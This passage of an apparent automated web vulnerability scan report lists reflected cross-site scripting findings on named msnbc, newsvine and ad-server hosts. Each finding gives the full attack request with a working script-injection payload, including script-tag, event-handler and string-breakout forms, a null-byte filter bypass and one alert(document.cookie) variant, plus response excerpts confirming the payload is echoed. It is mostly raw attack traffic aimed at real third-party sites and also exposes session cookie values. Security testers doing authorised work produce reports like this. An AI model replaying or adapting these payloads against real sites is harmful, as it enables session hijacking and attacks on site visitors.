This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-privacy?edf78"><script>alert(1)</script>dfde2d718a=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.247. http://technolog.msnbc.redacted/science [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/science

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a821"><script>alert(1)</script>b786dcb3635 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /science?1a821"><script>alert(1)</script>b786dcb3635=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.248. http://technolog.msnbc.redacted/social-media [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/social-media

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12220"><script>alert(1)</script>e33ff4d9b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /social-media?12220"><script>alert(1)</script>e33ff4d9b49=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.249. http://technolog.msnbc.redacted/twitter [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/twitter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d574"><script>alert(1)</script>c024c76222e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /twitter?9d574"><script>alert(1)</script>c024c76222e=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.250. http://technolog.msnbc.redacted/verizon-wireless [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/verizon-wireless

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319d5"><script>alert(1)</script>049683b898c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /verizon-wireless?319d5"><script>alert(1)</script>049683b898c=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.251. http://technolog.msnbc.redacted/viral [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/viral

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c125e"><script>alert(1)</script>c8d83ce76c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viral?c125e"><script>alert(1)</script>c8d83ce76c4=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.252. http://technolog.msnbc.redacted/windows-phone-7 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/windows-phone-7

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9291"><script>alert(1)</script>7cb6a5b6f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /windows-phone-7?b9291"><script>alert(1)</script>7cb6a5b6f1c=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.253. http://technolog2.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog2.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfc1"-alert(1)-"8900880333e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?8cfc1"-alert(1)-"8900880333e=1 HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:54:40 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3d19d956049533bc77cf73673a3c5868; expires=Sat, 25-Jan-2031 02:54:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
"";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","4509835","http://technolog2.newsvine.com/?8cfc1"-alert(1)-"8900880333e=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.254. http://thelastword.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thelastword.msnbc.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406b"><script>alert(1)</script>2b8d8f3d529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1406b"><script>alert(1)</script>2b8d8f3d529=1 HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.255. http://thelastword.msnbc.redacted/_vine/printer [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thelastword.msnbc.redacted
Path:	/_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 73d76<img%20src%3da%20onerror%3dalert(1)>9f3c8012458 was submitted in the path parameter. This input was echoed as 73d76<img src=a onerror=alert(1)>9f3c8012458 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=thelastword&path=/73d76<img%20src%3da%20onerror%3dalert(1)>9f3c8012458 HTTP/1.1
Host: thelastword.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=0; jt_time=1296391736965

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 15:04:31 GMT
Connection: close
Content-Length: 505

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
:{"lgstate":-1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"24773034","domainName":"thelastword","displayName":"The Last Word","avatar":null,"path":"\/73d76<img src=a onerror=alert(1)>9f3c8012458"},"revision":"23247"}

5.256. http://toddkenreck.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://toddkenreck.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a9c"-alert(1)-"6afa59ca3a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?20a9c"-alert(1)-"6afa59ca3a6=1 HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:30 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b7ceac04b38fe3c57cfc6121518e2eed; expires=Sat, 25-Jan-2031 02:58:30 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","3897081","http://toddkenreck.newsvine.com/?20a9c"-alert(1)-"6afa59ca3a6=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.257. http://redcated/APM/iview/139941180/direct [;wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/139941180/direct

Issue detail

The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c2db</script><script>alert(1)</script>d7be7cfafdb was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click=4c2db</script><script>alert(1)</script>d7be7cfafdb HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1891
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:05 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.MSNMEN/B3889285.6;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=4c2db</script><script>alert(1)</script>d7be7cfafdbhttp://clk.redcated/goiframe/198094427.198102269/139941180/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + randNu
...[SNIP]...

5.258. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/139941180/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf01"-alert(1)-"5cff1b03f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click=&faf01"-alert(1)-"5cff1b03f70=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1814
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:49 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.msn/B2087123.383;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&faf01"-alert(1)-"5cff1b03f70=1http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

5.259. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db6a3</script><script>alert(1)</script>5e444db1be0 was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=db6a3</script><script>alert(1)</script>5e444db1be0 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6864
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:07 GMT

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91283965132066();
var _CP91283965132066_Instance =
{
click : "db6a3</script><script>alert(1)</script>5e444db1be0",
clickThruUrl: "http://clk.redcated/go/148848786/direct;wi.728;hi.90;ai.197439863.197970693.196187415;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize
...[SNIP]...

5.260. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f440c</script>34fd740c671 was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=f440c</script>34fd740c671 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6739
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:41 GMT

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91283965132066();
var _CP91283965132066_Instance =
{
click : "f440c</script>34fd740c671",
clickThruUrl: "http://clk.redcated/go/148848786/direct;wi.728;hi.90;ai.197439863.197970693.196187415;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize
...[SNIP]...

5.261. http://redcated/APM/iview/148848786/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db9c4'%3b6f7b580b6b3 was submitted in the REST URL parameter 4. This input was echoed as db9c4';6f7b580b6b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /APM/iview/148848786/db9c4'%3b6f7b580b6b3 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7013
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:57:52 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/148848786/db9c4';6f7b580b6b3;ai.197614850.196614446.198086532;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/148848786/db9c4';6f7b580b6b3;ai.197614850.196614446.198086532;ct.1/01" />
...[SNIP]...

5.262. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c9648"-alert(1)-"596946acf51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9648"-alert(1)-"596946acf51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=&%00c9648"-alert(1)-"596946acf51=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1746
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:17 GMT

<SCRIPT Language="Javascript">
var DCcode="N5506.MSN/B5070033.82;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&%00c9648"-alert(1)-"596946acf51=1http://clk.redcated/goiframe/201270508.201301833/148848786/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

5.263. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf4f"-alert(1)-"841113d9fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=&aaf4f"-alert(1)-"841113d9fd6=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
